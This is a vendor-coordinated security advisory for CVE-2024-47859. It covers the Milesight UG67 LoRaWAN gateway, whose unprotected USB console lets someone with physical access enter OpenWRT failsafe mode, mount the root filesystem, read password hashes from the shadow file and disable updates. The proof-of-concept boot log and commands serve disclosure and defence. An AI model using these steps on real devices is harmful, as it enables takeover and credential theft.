Advisory: Milesight UG67: Privileged Access Using USB Console Attackers with physical access to the Milesight UG67 Outdoor LoRaWAN Gateway are able to gain full control over the installed operating system using an unprotected USB console. ### Details - Product: Milesight UG67 Outdoor LoRaWAN Gateway - Affected Versions: 60.0.0.42-r5, likely others - Fixed Versions: 60.0.0.44 - Vulnerability Type: Unprotected Local Console - Security Risk: medium - Vendor URL: https://www.milesight.com/iot/product/lorawan-gateway/ug67 - Vendor Status: fixed version released - Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2024-001 - Advisory Status: published - CVE: CVE-2024-47859 - CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47859 ### Introduction The Milesight UG67 is a robust outdoor LoRaWAN® gateway designed for outdoor deployments. ### More Details The Milesight UG67 Outdoor LoRaWAN Gateway provides a USB-C socket marked 'Console' below the lower right transparent screw cap. This socket provides a serial interface to the gateway's main CPU via a built-in Silicon Labs CP2102 USB-to-serial converter. ### Proof of Concept With physical access, it is possible to connect the gateway to an attacker's system via USB, and use a serial TTY tool ('tio' in the following) to interact with the device. During power on or reboot (which can for example be achieved by cutting power for a few minutes) it is possible to observe system startup messages: ``` # tio Connected U-Boot SPL 2018.03 (Sep 15 2020 - 15:46:58 +0800) [...] Starting kernel ... Booting Linux on physical CPU 0x0 Linux version 4.14.98 (root@andy) #305 SMP Thu Oct 26 21:01:07 2023 Sotfware : linux-ug6x-2.1.3 [...] Press the [f] key and hit [enter] to enter failsafe mode Press the [1], [2], [3] or [4] key and hit [enter] to select the debug level f - failsafe - [...] root@(none) BusyBox v1.25.1 (2023-11-01 14:45:57 CST) built-in shell (ash) ================= FAILSAFE MODE active ================ special commands: * firstboot reset settings to factory defaults * mount_root mount root-partition with config files after mount_root: * passwd change root's password * /etc/config directory with config files ``` By using the 'f' key when prompted it is possible to enter the failsafe mode of the underlying OpenWRT system. This allows to mount the root filesystem: ``` root@(none):/# mount_root ``` At this point, an attacker has full access to the system. That way, stored account information and password hashes from '/overlay/upper/etc/shadow', or, if present, VPN credentials can be extracted for analysis. With 'root' privileges, it is also possible to freely modify the system, including disabling the firmware upgrade mechanism to prevent future updates from cleaning the device. See [rt-sa-2024-002](https://www.redteam-pentesting.de/advisories/rt-sa-2024-002) for an analysis of the password hashes of the default user accounts. ### Workaround Mount the UG67 Outdoor LoRaWAN Gateway at a physically secure location, for example indoors, to protect it from physical access. ### Fix Failsafe mode should be disabled in the OpenWRT configuration using ``` Preinit configuration options -> Disable failsafe ``` as described in the patch ### Security Risk With physical access to the Milesight UG67 Outdoor LoRaWAN Gateway, it is possible to gain full control over the installed operating system by briefly attaching a USB interface, rebooting the system and typing the 'f' key. While the requirement for physical access limits possible attackers, the Milesight UG67 Outdoor LoRaWAN Gateway is intended to be mounted outdoors, which exposes it. Due to the precondition of physical access the unprotected USB console is deemed to pose a medium risk despite the grave consequences for the device. ### Timeline - 2024-04-25 Vulnerability identified - 2024-04-29 Customer approved disclosure to vendor - 2024-05-14 Vendor notified - 2024-06-28 asked Vendor for update - 2024-07-03 Vendor will provide Update until end of July - 2024-07-24 asked Vendor for update - 2024-07-30 Vendor stated: Work in Progress - 2024-08-09 Vendor stated: Fix expected Q3/24 - 2024-09-24 CVE ID requested - 2024-09-24 asked Vendor for update - 2024-09-24 Vendor stated: Fix in 60.0.0.44 - 2024-10-04 CVE ID assigned - 2024-10-07 asked Vendor for update - 2024-10-08 Vendor stated: Fix will be available mid-October - 2024-10-18 asked Vendor for update - 2024-10-21 Vendor stated: Fix will be available mid-November - 2024-11-04 Vendor released fixed version for testing - 2024-11-05 Vendor released fixed version - 2024-12-10 Customer approved public release of vulnerabiltiy details - 2024-12-10 Advisory released ### RedTeam Pentesting GmbH RedTeam Pentesting offers individual penetration tests performed by a team of specialised IT-security experts. Hereby, security weaknesses in company networks or products are uncovered and can be fixed immediately. As there are only few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance the public knowledge with research in security-related areas. The results are made available as public security advisories. More information about RedTeam Pentesting can be found at: ### Working at RedTeam Pentesting RedTeam Pentesting is looking for penetration testers to join our team in Aachen, Germany. If you are interested please visit: